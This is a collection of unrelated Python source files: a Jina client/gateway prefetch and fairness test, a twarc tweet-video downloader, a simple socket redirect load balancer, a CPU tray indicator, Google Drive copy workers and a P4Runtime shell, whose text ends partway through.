assert final_da['id-2'].tags['input_gen'] < final_da['id-2'].tags['executor']
assert final_da['id-2'].tags['executor'] < final_da['id-2'].tags['on_done']
assert final_da['id-2'].tags['on_done'] < final_da['id-3'].tags['input_gen']
assert final_da['id-3'].tags['input_gen'] < final_da['id-3'].tags['executor']
assert final_da['id-3'].tags['executor'] < final_da['id-3'].tags['on_done']
@pytest.mark.parametrize(
'protocol, inputs',
[
('grpc', async_gen),
('grpc', blocking_gen),
('websocket', async_gen),
('websocket', blocking_gen),
('http', async_gen),
('http', blocking_gen),
],
)
def test_disable_prefetch_fast_client_slow_executor(
protocol, inputs, monkeypatch, simple_graph_dict_slow
):
monkeypatch.setattr(
networking.GrpcConnectionPool,
'send_requests_once',
DummyMockConnectionPool.send_requests_once,
)
port = random_port()
final_da = DocumentArray()
p = multiprocessing.Process(
target=create_runtime,
kwargs={
'protocol': protocol,
'port': port,
'graph_dict': simple_graph_dict_slow,
},
)
p.start()
time.sleep(1.0)
client = Client(protocol=protocol, port=port, return_responses=True)
client.post(
on='/',
inputs=inputs,
request_size=1,
on_done=lambda response: on_done(response, final_da),
)
p.terminate()
p.join()
assert len(final_da) == INPUT_LEN
# since Executor is slow, all client inputs should be read before 1st request exits from Executor.
assert (
final_da['id-0'].id < final_da['id-1'].id
), f'ids are not ordered with times {final_da["id-0"].tags["input_gen"]} and {final_da["id-1"].tags["input_gen"]}'
assert (
final_da['id-1'].id < final_da['id-2'].id
), f'ids are not ordered with times {final_da["id-1"].tags["input_gen"]} and {final_da["id-2"].tags["input_gen"]}'
assert (
final_da['id-2'].id < final_da['id-3'].id
), f'ids are not ordered with times {final_da["id-2"].tags["input_gen"]} and {final_da["id-3"].tags["input_gen"]}'
assert final_da['id-0'].tags['input_gen'] < final_da['id-1'].tags['input_gen']
assert final_da['id-1'].tags['input_gen'] < final_da['id-2'].tags['input_gen']
assert final_da['id-2'].tags['input_gen'] < final_da['id-3'].tags['input_gen']
assert final_da['id-3'].tags['input_gen'] < final_da['id-0'].tags['executor']
# At least 1 request should reache `on_done` before all requests are processed in the Executor.
# Validates that the requests are not pending at the Executor
first_on_done_time = min(i.tags['on_done'] for i in final_da)
last_executor_time = max(i.tags['executor'] for i in final_da)
assert first_on_done_time < last_executor_time
@pytest.mark.parametrize('prefetch', [0, 5])
@pytest.mark.parametrize('protocol', ['websocket', 'http', 'grpc'])
def test_multiple_clients(prefetch, protocol, monkeypatch, simple_graph_dict_indexer):
GOOD_CLIENTS = 5
GOOD_CLIENT_NUM_DOCS = 20
MALICIOUS_CLIENT_NUM_DOCS = 50
def get_document(i):
return Document(
id=f'{multiprocessing.current_process().name}_{i}',
text=str(bytes(bytearray(os.urandom(512 * 4)))),
)
async def good_client_gen():
for i in range(GOOD_CLIENT_NUM_DOCS):
yield get_document(i)
await asyncio.sleep(0.1)
async def malicious_client_gen():
for i in range(1000, 1000 + MALICIOUS_CLIENT_NUM_DOCS):
yield get_document(i)
def client(gen, port):
Client(protocol=protocol, port=port).post(
on='/index', inputs=gen, request_size=1, return_responses=True
)
monkeypatch.setattr(
networking.GrpcConnectionPool,
'send_requests_once',
DummyMockConnectionPool.send_requests_once,
)
port = random_port()
pool = []
runtime_process = multiprocessing.Process(
target=create_runtime,
kwargs={
'protocol': protocol,
'port': port,
'graph_dict': simple_graph_dict_indexer,
'prefetch': prefetch,
},
)
runtime_process.start()
time.sleep(1.0)
# We have 5 good clients connecting to the same gateway. They have controlled requests.
# Each client sends `GOOD_CLIENT_NUM_DOCS` (20) requests and sleeps after each request.
for i in range(GOOD_CLIENTS):
cp = multiprocessing.Process(
target=partial(client, good_client_gen, port),
name=f'goodguy_{i}',
)
cp.start()
pool.append(cp)
# and 1 malicious client, sending lot of requests (trying to block others)
cp = multiprocessing.Process(
target=partial(client, malicious_client_gen, port),
name='badguy',
)
cp.start()
pool.append(cp)
for p in pool:
p.join()
order_of_ids = list(
Client(protocol=protocol, port=port, return_responses=True)
.post(on='/status', inputs=[Document()])[0]
.docs[0]
.tags['ids']
)
# There must be total 150 docs indexed.
runtime_process.terminate()
runtime_process.join()
assert (
len(order_of_ids)
== GOOD_CLIENTS * GOOD_CLIENT_NUM_DOCS + MALICIOUS_CLIENT_NUM_DOCS
)
"""
If prefetch is set, each Client is allowed (max) 5 requests at a time.
Since requests are controlled, `badguy` has to do the last 20 requests.
If prefetch is disabled, clients can freeflow requests. No client is blocked.
Hence last 20 requests go from `goodguy`.
(Ideally last 30 requests should be validated, to avoid flaky CI, we test last 20)
When there are no rules, badguy wins! With rule, you find balance in the world.
"""
if protocol == 'http':
# There's no prefetch for http.
assert set(map(lambda x: x.split('_')[0], order_of_ids[-20:])) == {'goodguy'}
elif prefetch == 5:
assert set(map(lambda x: x.split('_')[0], order_of_ids[-20:])) == {'badguy'}
elif prefetch == 0:
assert set(map(lambda x: x.split('_')[0], order_of_ids[-20:])) == {'goodguy'}
|
twarc_videos.py
|
import os
import sys
import json
import time
import click
import logging
import youtube_dl
import multiprocessing as mp
from urllib.parse import urlparse
from twarc import ensure_flattened
from datetime import datetime, timedelta
from youtube_dl.utils import match_filter_func
@click.command()
@click.option('--max-downloads', type=int, help='max downloads per URL')
@click.option('--max-filesize', type=int, help='max filesize to download (bytes)')
@click.option('--ignore-livestreams', is_flag=True, default=False, help='ignore livestreams')
@click.option('--download-dir', type=str, default='videos', help='directory to download to')
@click.option('--block', multiple=True, help='hostname(s) to block (repeatable)')
@click.option('--timeout', type=int, default=120, help='seconds to wait for a video download to finish')
@click.option('--quiet', is_flag=True, default=False, help='silence terminal output')
@click.argument('infile', type=click.File('r'), default='-')
def videos(max_downloads, max_filesize, ignore_livestreams, download_dir, block, timeout, infile, quiet):
"""
Download videos referenced in tweets and their metadata.
"""
# make download directory
download_dir = download_dir
if not os.path.isdir(download_dir):
os.mkdir(download_dir)
# setup logger
log_file = "{}/twarc-videos.log".format(download_dir)
logging.basicConfig(filename=log_file, level=logging.INFO)
log = logging.getLogger()
# setup youtube_dl config
ydl_opts = {
"format": "best",
"logger": log,
"restrictfilenames": True,
"ignoreerrors": True,
"nooverwrites": True,
"writedescription": True,
"writeinfojson": True,
"writesubtitles": True,
"writeautomaticsub": True,
"outtmpl": "{}/%(extractor)s/%(id)s/%(title)s.%(ext)s".format(download_dir),
"download_archive": "{}/archive.txt".format(download_dir)
}
if ignore_livestreams:
ydl_opts["matchfilter"] = match_filter_func("!is_live")
if max_downloads:
ydl_opts['max_downloads'] = max_downloads
if max_filesize:
ydl_opts['max_filesize'] = max_filesize
# keep track of domains to block
blocklist = []
if block:
blocklist = block
# read in existing mapping file to know which urls we can ignorej
seen = set()
mapping_file = os.path.join(download_dir, 'mapping.tsv')
if os.path.isfile(mapping_file):
for line in open(mapping_file):
url, path = line.split('\t')
log.info('found %s in %s', url, mapping_file)
seen.add(url)
# loop through the tweets
results = open(mapping_file, 'a')
for line in infile:
for tweet in ensure_flattened(json.loads(line)):
log.info('analyzing %s', tweet['id'])
for url in video_urls(tweet):
if url in seen:
log.info('already processed %s', url)
continue
seen.add(url)
# check for blocks
uri = urlparse(url)
if uri.netloc in blocklist:
logging.warn("%s in block list", url)
continue
log.info('processing %s', url)
manager = mp.Manager()
return_list = manager.list()
p = mp.Process(target=download, args=(url, ydl_opts, log, max_downloads, return_list))
p.start()
started = datetime.now()
while True:
# if we've exceeded the timeout terminate the process
if timeout and datetime.now() - started > timedelta(seconds=timeout):
log.warning('reached timeout %s', timeout)
p.terminate()
break
# if the process is done we can stop
elif not p.is_alive():
break
# otherwise sleep and the check again
time.sleep(1)
p.join()
# if the queue was empty there either wasn't a download or it timed out
filename = return_list.pop() if len(return_list) > 0 else None
if not quiet and filename:
click.echo(f'downloaded {click.style(url, fg="blue")} as {click.style(filename, fg="green")}')
# write the result to the mapping file
results.write("{}\t{}\n".format(url, filename))
def video_urls(t):
if 'entities' not in t:
return
# if video is attached to the tweet return the tweet url
attachments = t['entities'].get('attachments', {})
for media in attachments.get('media', []):
if media['type'] == 'video':
yield f"https://twitter.com/{t['author']['username']}/status/{t['id']}"
# return every url in a tweet to see if video can be extracted
for url in t['entities'].get('urls', []):
yield url['expanded_url']
def download(url, ydl_opts, log, max_downloads, return_list):
try:
ydl = youtube_dl.YoutubeDL(ydl_opts)
info = ydl.extract_info(url)
if info:
filename = ydl.prepare_filename(info)
if os.path.isfile(filename):
return_list.append(filename)
logging.info('downloaded %s as %s', url, filename)
else:
logging.warning("%s doesn't look like a video", url)
except youtube_dl.utils.MaxDownloadsReached as e:
logging.warning('only %s downloads per url allowed', max_downloads)
|
libra.py
|
#Main file, defining Libra, socket select server to accept requests
#It must be optimized, this is naive
import select, queue, math
import socket, sys, random, client
import threading, reques
import time
counter = 1
weight = 0
class Libra:
def __init__(self):
self._redirects = []
self.outputs = []
self.message_queues = {}
self.inputs = []
self._weight = 5
def listen(self,address,port):
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server.setblocking(0)
self.server.bind((address, port))
self.server.listen(5)
self.inputs = [self.server]
print('\n\n')
print(' Server listening on: '+address+':'+str(port))
time.sleep(1)
print('\n')
def start(self):
global counter
global weight
n = 0
weight = self._weight
if len(self._redirects) > 0:
print('\n')
print(' Libra started waiting for requests...')
print('\n')
while self.inputs:
readable, writable, exceptional = select.select(self.inputs, self.outputs, self.message_queues)
for s in readable:
if s is self.server:
self.connection, client_address = s.accept()
self.connection.setblocking(0)
self.inputs.append(self.connection)
self.message_queues[self.connection] = queue.Queue()
else:
data = str(s.recv(1024))
if data:
self.message_queues[s].put(data)
if s not in self.outputs:
self.outputs.append(s)
else:
if s in self.outputs:
self.outputs.remove(s)
self.inputs.remove(s)
s.close()
del self.message_queues[s]
for s in writable:
try:
next_msg = self.message_queues[s].get_nowait()
print(' Request from: '+ str(client_address))
except queue.Empty:
self.outputs.remove(s)
if next_msg != '':
if len(self._redirects) > 0:
for el in self._redirects:
try:
client.connect(socket.gethostbyname(el))
except SystemExit:
self._redirects.remove(el)
if len(self._redirects) > 0:
if(reques.http(next_msg)):
test = math.inf
if(counter > weight):
try:
self._redirects[n+1]
n += 1
weight = self._weight + weight
except IndexError:
n = 0
counter = 1
weight = self._weight
r = 'HTTP/1.1 301 Moved Permanently\r\nServer: Libra\r\nRetry-After: 1\r\nLocation: https://'+str(self._redirects[n])+'\r\n'
counter += 1
print(' Redirected to: '+str(self._redirects[n]))
s.send(str.encode(r))
if s in self.outputs:
self.outputs.remove(s)
self.inputs.remove(s)
s.close()
del self.message_queues[s]
else:
print(' No servers available, change the redirects list.')
for s in exceptional:
self.inputs.remove(s)
if s in self.outputs:
self.outputs.remove(s)
s.close()
del self.message_queues[s]
else:
print(' No redirects list, use add method.')
self.server.close()
print(' Server closed.\n')
sys.exit(0)
def thread(self):
for i in range(10):
t = threading.Thread(target=self.start())
t.start()
|
cpu_indicator.pyw
|
import time
from threading import Thread
import pystray
from PIL import Image, ImageDraw, ImageFont
from psutil import cpu_percent
class Indicator:
# changeable variables
REFRESH_INTERVAL = 0.5
FONT_SIZE = 200
ICON_RES = 250, 250
FONT = ImageFont.truetype('arial.ttf', FONT_SIZE)
BLUE_BG = Image.new('RGB', ICON_RES, color=(61, 75, 129))
RED_BG = Image.new('RGB', ICON_RES, color=(255, 0, 0))
def __init__(self):
self.icon = pystray.Icon("usage", title="CPU Usage")
self.icon.menu = pystray.Menu(pystray.MenuItem('Exit', lambda: self.exit_action()))
self.refresh_icon_thread = None
# this is so that our icon refresher thread knows when to stop
self.stopped = False
def exit_action(self):
self.icon.stop()
self.stopped = True
def refresh_icon(self):
while True:
if self.stopped is True:
return
# ceil the usage without the math lib
# to decrease the size of the .exe file
# (this most likely didnt help at all)
usage = cpu_percent(interval=0)
usage = int(- (-usage // 1))
# decide bg depending on usage
image = self.RED_BG.copy() if usage > 70 else self.BLUE_BG.copy()
# draw the usage text over bg
draw = ImageDraw.Draw(image)
draw.text(
# center the usage text
xy=(
self.ICON_RES[0] / 2,
self.ICON_RES[1] / 2
),
anchor="mm", # https://pillow.readthedocs.io/en/stable/handbook/text-anchors.html#text-anchors
text=str(usage),
font=self.FONT,
fill=(255, 255, 255),
)
self.icon.icon = image
time.sleep(self.REFRESH_INTERVAL)
def start(self):
self.refresh_icon_thread = Thread(daemon=True, target=self.refresh_icon)
self.refresh_icon_thread.start()
# wait a bit so that an icon is set
time.sleep(0.5)
self.icon.run()
self.refresh_icon_thread.join()
Indicator().start()
|
task.py
|
from core.function import *
from core.sa import *
from core.tools import *
import threading
import time
def AsynListAll(worker=1):
"""ListAll 获取指定文件夹下的所有子文件夹以及相关文件
Args:
service ([type]): 服务账号信息
"""
assert worker > 0, "工作线程必须大于0"
status_with_exit = [False] * worker
lock = threading.Lock()
def task(index):
sa_info = SAManage.request()
service = sa_info.service
while (not all(status_with_exit)):
while ((Global.SearchFolderQueue.qsize() > 0)
and (not Global.isExit)):
current_folder = Global.SearchFolderQueue.get()
lock.acquire()
status_with_exit[index] = False
lock.release()
files = []
try:
files = ListCurrent(service, current_folder)
Global.add_folder_information(current_folder)
except Exception as e:
Global.logger.error(str(e))
Global.SearchFolderQueue.put(current_folder)
sa_info.cum_error += 1
SAManage.recycle(sa_info)
sa_info = SAManage.request()
service = sa_info.service
continue
for sub_file_info in files:
#sub_file_info = FileInfo(sub_file_info)
sub_file_info.parent = current_folder.uid
if (sub_file_info.is_folder):
# 添加文件夹
Global.SearchFolderQueue.put(sub_file_info)
else:
# 添加文件
Global.CreateFileQueue.put(sub_file_info)
status_with_exit[index] = True
time.sleep(1)
SAManage.recycle(sa_info)
threads = []
for i in range(worker):
t = threading.Thread(target=task, args=(i, ))
t.start() # 启动线程,即让线程开始执行
threads.append(t)
for t in threads:
t.join()
def AsynSaveTo(src: str, dst: str, worker=1, is_first=True):
assert worker > 0, "工作线程必须大于0"
status_with_exit = [False] * worker
lock = threading.Lock()
if (is_first):
# sa_info = SAManage.request()
# service = sa_info.service
# src_info = AddFirst(service, src, dst)
# SAManage.recycle(sa_info)
src_info = None
with SAManage.request() as sa_info:
service = sa_info.service
src_info = AddFirst(service, src, dst)
AsynListAll(worker=worker)
Global.add_create_folder(src_info) # 将目标顶级文件夹放入待创建文件夹队列
parent2children = get_all_children(Global.SearchInformation,
src_info.parent)
if (Global.isExit):
return
def task_1(index):
"""task_1 创建文件夹
Args:
index ([type]): 线程标志
"""
sa_info = SAManage.request()
service = sa_info.service
while (not all(status_with_exit)):
while ((Global.CreateFolderQueue.qsize() > 0)
and (not Global.isExit)):
cur_info = Global.CreateFolderQueue.get()
lock.acquire()
status_with_exit[index] = False
lock.release()
try:
res_uid = CreateFolder(service, cur_info,
Global.Parallelism[cur_info.parent])
Global.Parallelism[cur_info.uid] = res_uid
# 将current folder 的子文件夹加入到待创建文件夹队列中
for uid in parent2children[cur_info.uid]:
if uid == cur_info.uid:
continue
Global.add_create_folder(Global.SearchInformation[uid])
except Exception as e:
print("{0} 触发错误, 无法创建文件夹: {1}".format(sa_info.uid, str(e)))
Global.logger.error(str(e))
Global.CreateFolderQueue.put(cur_info)
sa_info.cum_error += 1
SAManage.recycle(sa_info)
sa_info = SAManage.request()
service = sa_info.service
status_with_exit[index] = True
time.sleep(1)
SAManage.recycle(sa_info)
def task_2(index):
"""task_2 拷贝文件
Args:
index ([type]): 线程标识
"""
sa_info = SAManage.request()
service = sa_info.service
while (not all(status_with_exit)):
while ((Global.CreateFileQueue.qsize() > 0)
and (not Global.isExit)):
cur_info = Global.CreateFileQueue.get()
#print(cur_info.name)
lock.acquire()
status_with_exit[index] = False
lock.release()
try:
string = "thread: {0}\tcopy file {1}".format(
index, cur_info.name)
Global.logger.info(string)
Copy(service, cur_info.uid,
Global.Parallelism[cur_info.parent])
except Exception as e:
print("{0} 触发错误, 无法拷贝文件".format(sa_info.uid))
Global.logger.error(str(e))
Global.CreateFileQueue.put(cur_info)
sa_info.cum_error += 1
SAManage.recycle(sa_info)
sa_info = SAManage.request()
service = sa_info.service
status_with_exit[index] = True
time.sleep(1)
SAManage.recycle(sa_info)
threads = []
for i in range(worker):
t = threading.Thread(target=task_1, args=(i, ))
t.start() # 启动线程,即让线程开始执行
threads.append(t)
for t in threads:
t.join()
status_with_exit = [False] * worker
threads = []
for i in range(worker):
t = threading.Thread(target=task_2, args=(i, ))
t.start() # 启动线程,即让线程开始执行
threads.append(t)
for t in threads:
t.join()
def SyncBackup(src: str, dst: str, worker=1, is_first=True):
src_info = None
dst_info = None
with SAManage.request() as sa_info:
service = sa_info.service
src_info = Get(service, src)
dst_info = Get(service, dst)
Global.SearchFolderQueue.put(dst_info)
AsynListAll(worker)
dst_total_files_info = Global.INFO
Global.INFO = {}
Global.SearchFolderQueue.put(src_info)
AsynListAll(worker)
src_total_files_info = Global.INFO
Global.clear()
copy_folders = queue.Queue() # dst文件夹中完全不存在的文件夹, 直接整体复制
search_folders = queue.Queue() # dst文件夹中存在同名文件夹, 需要进一步遍历
copy_files = [] # dst中不存在的文件
search_folders.put((src, dst))
Global.Parallelism[src] = dst
while (search_folders.qsize() > 0):
src_uid, dst_uid = search_folders.get()
src_children = src_total_files_info[src_uid]
dst_children = dst_total_files_info[dst_uid]
for item in src_children:
if item not in dst_children:
if item.is_folder:
# 寻找dst文件夹中不存在的文件夹
copy_folders.put(item) #1
else:
# 寻找dst文件夹中不存在的文件
copy_files.append(item) #2
for item_1 in src_children:
for item_2 in dst_children:
if (item_1.is_folder & item_2.is_folder & (item_1 == item_2)):
# 相同文件名的文件夹进入查找队列
search_folders.put((item_1.uid, item_2.uid)) #3
Global.Parallelism[item_1.uid] = item_2.uid
for item in copy_files:
Global.CreateFileQueue.put(item)
while (copy_folders.qsize()):
info = copy_folders.get()
Global.CreateFolderQueue.put(item)
for item in src_total_files_info[info.uid]:
if item.is_folder:
copy_folders.put(item)
else:
Global.CreateFileQueue.put(item)
sa_info = SAManage.request()
service = sa_info.service
folder_list = []
while (Global.CreateFolderQueue.qsize() > 0):
cur_info = Global.CreateFolderQueue.get()
folder_list.append(cur_info)
while (len(folder_list) > 0):
cur_info = folder_list.pop()
try:
res_uid = CreateFolder(service, cur_info,
Global.Parallelism[cur_info.parent])
Global.Parallelism[cur_info.uid] = res_uid
except Exception as e:
print("{0} 触发错误, 无法创建文件夹: {1}".format(sa_info.uid, str(e)))
Global.logger.error(str(e))
folder_list.append(cur_info)
sa_info.cum_error += 1
SAManage.recycle(sa_info)
sa_info = SAManage.request()
service = sa_info.service
SAManage.recycle(sa_info)
status_with_exit = [False] * worker
lock = threading.Lock()
def task_2(index):
"""task_2 拷贝文件
Args:
index ([type]): 线程标识
"""
sa_info = SAManage.request()
service = sa_info.service
while (not all(status_with_exit)):
while ((Global.CreateFileQueue.qsize() > 0)
and (not Global.isExit)):
cur_info = Global.CreateFileQueue.get()
#print(cur_info.name)
lock.acquire()
status_with_exit[index] = False
lock.release()
try:
string = "thread: {0}\tcopy file {1}".format(
index, cur_info.name)
Global.logger.info(string)
Copy(service, cur_info.uid,
Global.Parallelism[cur_info.parent])
except Exception as e:
print("{0} 触发错误, 无法拷贝文件".format(sa_info.uid))
Global.logger.error(str(e))
Global.CreateFileQueue.put(cur_info)
sa_info.cum_error += 1
SAManage.recycle(sa_info)
sa_info = SAManage.request()
service = sa_info.service
status_with_exit[index] = True
time.sleep(1)
SAManage.recycle(sa_info)
threads = []
for i in range(worker):
t = threading.Thread(target=task_2, args=(i, ))
t.start() # 启动线程,即让线程开始执行
threads.append(t)
for t in threads:
t.join()
|
shell.py
|
# Copyright 2019 Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import argparse
from collections import Counter, namedtuple, OrderedDict
import enum
import logging
from threading import Thread
from IPython import start_ipython
from traitlets.config.loader import Config
from IPython.terminal.prompts import Prompts, Token
import os.path
import sys
from p4runtime_sh.p4runtime import P4RuntimeClient, P4RuntimeException, parse_p4runtime_error
from p4.v1 import p4runtime_pb2
from p4.config.v1 import p4info_pb2
from . import bytes_utils
from . global_options import global_options
from .context import P4RuntimeEntity, P4Type, Context
from .utils import UserError, InvalidP4InfoError
import google.protobuf.text_format
from google.protobuf import descriptor
import queue
context = Context()
client = None
class UserUsageError(UserError):
def __init__(self, usage):
self.usage = usage
def __str__(self):
return "Usage: " + self.usage
class NotSupportedYet(UserError):
def __init__(self, what):
self.what = what
def __str__(self):
return "{} is not supported yet".format(self.what)
class _PrintContext:
def __init__(self):
self.skip_one = False
self.stack = []
def find_table(self):
for msg in reversed(self.stack):
if msg.DESCRIPTOR.name == "TableEntry":
try:
return context.get_name_from_id(msg.table_id)
except KeyError:
return None
return None
def find_action(self):
for msg in reversed(self.stack):
if msg.DESCRIPTOR.name == "Action":
try:
return context.get_name_from_id(msg.action_id)
except KeyError:
return None
return None
def find_controller_packet_metadata(self):
for msg in reversed(self.stack):
if msg.DESCRIPTOR.name == "PacketIn":
return "packet_in"
if msg.DESCRIPTOR.name == "PacketOut":
return "packet_out"
return None
def _sub_object(field, value, pcontext):
id_ = value
try:
return context.get_name_from_id(id_)
except KeyError:
logging.error("Unknown object id {}".format(id_))
def _sub_mf(field, value, pcontext):
id_ = value
table_name = pcontext.find_table()
if table_name is None:
logging.error("Cannot find any table in context")
return
return context.get_mf_name(table_name, id_)
def _sub_ap(field, value, pcontext):
id_ = value
action_name = pcontext.find_action()
if action_name is None:
logging.error("Cannot find any action in context")
return
return context.get_param_name(action_name, id_)
def _sub_pkt_md(field, value, pcontext):
id_ = value
ctrl_pkt_md_name = pcontext.find_controller_packet_metadata()
return context.get_packet_metadata_name_from_id(ctrl_pkt_md_name, id_)
def _gen_pretty_print_proto_field(substitutions, pcontext):
def myPrintField(self, field, value):
self._PrintFieldName(field)
self.out.write(' ')
if field.type == descriptor.FieldDescriptor.TYPE_BYTES:
# TODO(antonin): any kind of checks required?
self.out.write('\"')
self.out.write(''.join('\\\\x{:02x}'.format(b) for b in value))
self.out.write('\"')
else:
self.PrintFieldValue(field, value)
subs = None
if field.containing_type is not None:
subs = substitutions.get(field.containing_type.name, None)
if subs and field.name in subs and value != 0:
name = subs[field.name](field, value, pcontext)
self.out.write(' ("{}")'.format(name))
self.out.write(' ' if self.as_one_line else '\n')
return myPrintField
def _repr_pretty_proto(msg, substitutions):
"""A custom version of google.protobuf.text_format.MessageToString which represents Protobuf
messages with a more user-friendly string. In particular, P4Runtime ids are supplemented with
the P4 name and binary strings are displayed in hexadecimal format."""
pcontext = _PrintContext()
def message_formatter(message, indent, as_one_line):
# For each messages we do 2 passes: the first one updates the _PrintContext instance and
# calls MessageToString again. The second pass returns None immediately (default handling by
# text_format).
if pcontext.skip_one:
pcontext.skip_one = False
return
pcontext.stack.append(message)
pcontext.skip_one = True
s = google.protobuf.text_format.MessageToString(
message, indent=indent, as_one_line=as_one_line, message_formatter=message_formatter)
s = s[indent:-1]
pcontext.stack.pop()
return s
# We modify the "internals" of the text_format module which is not great as it may break in the
# future, but this enables us to keep the code fairly small.
saved_printer = google.protobuf.text_format._Printer.PrintField
google.protobuf.text_format._Printer.PrintField = _gen_pretty_print_proto_field(
substitutions, pcontext)
s = google.protobuf.text_format.MessageToString(msg, message_formatter=message_formatter)
google.protobuf.text_format._Printer.PrintField = saved_printer
return s
def _repr_pretty_p4info(msg):
substitutions = {
"Table": {"const_default_action_id": _sub_object,
"implementation_id": _sub_object,
"direct_resource_ids": _sub_object},
"ActionRef": {"id": _sub_object},
"ActionProfile": {"table_ids": _sub_object},
"DirectCounter": {"direct_table_id": _sub_object},
"DirectMeter": {"direct_table_id": _sub_object},
}
return _repr_pretty_proto(msg, substitutions)
def _repr_pretty_p4runtime(msg):
substitutions = {
"TableEntry": {"table_id": _sub_object},
"FieldMatch": {"field_id": _sub_mf},
"Action": {"action_id": _sub_object},
"Param": {"param_id": _sub_ap},
"ActionProfileMember": {"action_profile_id": _sub_object},
"ActionProfileGroup": {"action_profile_id": _sub_object},
"MeterEntry": {"meter_id": _sub_object},
"CounterEntry": {"counter_id": _sub_object},
"ValueSetEntry": {"value_set_id": _sub_object},
"RegisterEntry": {"register_id": _sub_object},
"DigestEntry": {"digest_id": _sub_object},
"DigestListAck": {"digest_id": _sub_object},
"DigestList": {"digest_id": _sub_object},
"PacketMetadata": {"metadata_id": _sub_pkt_md}
}
return _repr_pretty_proto(msg, substitutions)
class P4Object:
def __init__(self, obj_type, obj):
self.name = obj.preamble.name
self.id = obj.preamble.id
self._obj_type = obj_type
self._obj = obj
self.__doc__ = """
A wrapper around the P4Info Protobuf message for {} '{}'.
You can access any field from the message with <self>.<field name>.
You can access the name directly with <self>.name.
You can access the id directly with <self>.id.
If you need the underlying Protobuf message, you can access it with msg().
""".format(obj_type.pretty_name, self.name)
def __dir__(self):
d = ["info", "msg", "name", "id"]
if self._obj_type == P4Type.table:
d.append("actions")
return d
def _repr_pretty_(self, p, cycle):
p.text(_repr_pretty_p4info(self._obj))
def __str__(self):
return _repr_pretty_p4info(self._obj)
def __getattr__(self, name):
return getattr(self._obj, name)
def __settattr__(self, name, value):
return UserError("Operation not supported")
def msg(self):
"""Get Protobuf message object"""
return self._obj
def info(self):
print(_repr_pretty_p4info(self._obj))
def actions(self):
"""Print list of actions, only for tables and action profiles."""
if self._obj_type == P4Type.table:
for action in self._obj.action_refs:
print(context.get_name_from_id(action.id))
elif self._obj_type == P4Type.action_profile:
t_id = self._obj.table_ids[0]
t_name = context.get_name_from_id(t_id)
t = context.get_table(t_name)
for action in t.action_refs:
print(context.get_name_from_id(action.id))
else:
raise UserError("'actions' is only available for tables and action profiles")
class P4Objects:
def __init__(self, obj_type):
self._obj_type = obj_type
self._names = sorted([name for name, _ in context.get_objs(obj_type)])
self._iter = None
self.__doc__ = """
All the {pnames} in the P4 program.
To access a specific {pname}, use {p4info}['<name>'].
You can use this class to iterate over all {pname} instances:
\tfor x in {p4info}:
\t\tprint(x.id)
""".format(pname=obj_type.pretty_name, pnames=obj_type.pretty_names, p4info=obj_type.p4info_name)
def __call__(self):
for name in self._names:
print(name)
def _ipython_key_completions_(self):
return self._names
def __getitem__(self, name):
obj = context.get_obj(self._obj_type, name)
if obj is None:
raise UserError("{} '{}' does not exist".format(
self._obj_type.pretty_name, name))
return P4Object(self._obj_type, obj)
def __setitem__(self, name, value):
raise UserError("Operation not allowed")
def _repr_pretty_(self, p, cycle):
p.text(self.__doc__)
def __iter__(self):
self._iter = iter(self._names)
return self
def __next__(self):
name = next(self._iter)
return self[name]
class MatchKey:
def __init__(self, table_name, match_fields):
self._table_name = table_name
self._fields = OrderedDict()
self._fields_suffixes = {}
for mf in match_fields:
self._add_field(mf)
self._mk = OrderedDict()
self._set_docstring()
def _set_docstring(self):
self.__doc__ = "Match key fields for table '{}':\n\n".format(self._table_name)
for name, info in self._fields.items():
self.__doc__ += str(info)
self.__doc__ += """
Set a field value with <self>['<field_name>'] = '...'
* For exact match: <self>['<f>'] = '<value>'
* For ternary match: <self>['<f>'] = '<value>&&&<mask>'
* For LPM match: <self>['<f>'] = '<value>/<mask>'
* For range match: <self>['<f>'] = '<value>..<mask>'
* For optional match: <self>['<f>'] = '<value>'
If it's inconvenient to use the whole field name, you can use a unique suffix.
You may also use <self>.set(<f>='<value>')
\t(<f> must not include a '.' in this case, but remember that you can use a unique suffix)
"""
def _ipython_key_completions_(self):
return self._fields.keys()
def __dir__(self):
return ["clear"]
def _get_mf(self, name):
if name in self._fields:
return self._fields[name]
if name in self._fields_suffixes:
return self._fields[self._fields_suffixes[name]]
raise UserError(
"'{}' is not a valid match field name, nor a valid unique suffix, "
"for table '{}'".format(name, self._table_name))
def __setitem__(self, name, value):
field_info = self._get_mf(name)
self._mk[name] = self._parse_mf(value, field_info)
print(self._mk[name])
def __getitem__(self, name):
_ = self._get_mf(name)
print(self._mk.get(name, "Unset"))
def _parse_mf(self, s, field_info):
if type(s) is not str:
raise UserError("Match field value must be a string")
if field_info.match_type == p4info_pb2.MatchField.EXACT:
return self._parse_mf_exact(s, field_info)
elif field_info.match_type == p4info_pb2.MatchField.LPM:
return self._parse_mf_lpm(s, field_info)
elif field_info.match_type == p4info_pb2.MatchField.TERNARY:
return self._parse_mf_ternary(s, field_info)
elif field_info.match_type == p4info_pb2.MatchField.RANGE:
return self._parse_mf_range(s, field_info)
elif field_info.match_type == p4info_pb2.MatchField.OPTIONAL:
return self._parse_mf_optional(s, field_info)
else:
raise UserError("Unsupported match type for field:\n{}".format(field_info))
def _parse_mf_exact(self, s, field_info):
v = bytes_utils.parse_value(s.strip(), field_info.bitwidth)
return self._sanitize_and_convert_mf_exact(v, field_info)
def _sanitize_and_convert_mf_exact(self, value, field_info):
mf = p4runtime_pb2.FieldMatch()
mf.field_id = field_info.id
mf.exact.value = bytes_utils.make_canonical_if_option_set(value)
return mf
def _parse_mf_optional(self, s, field_info):
v = bytes_utils.parse_value(s.strip(), field_info.bitwidth)
return self._sanitize_and_convert_mf_optional(v, field_info)
def _sanitize_and_convert_mf_optional(self, value, field_info):
mf = p4runtime_pb2.FieldMatch()
mf.field_id = field_info.id
mf.optional.value = bytes_utils.make_canonical_if_option_set(value)
return mf
def _parse_mf_lpm(self, s, field_info):
try:
prefix, length = s.split('/')
prefix, length = prefix.strip(), length.strip()
except ValueError:
prefix = s
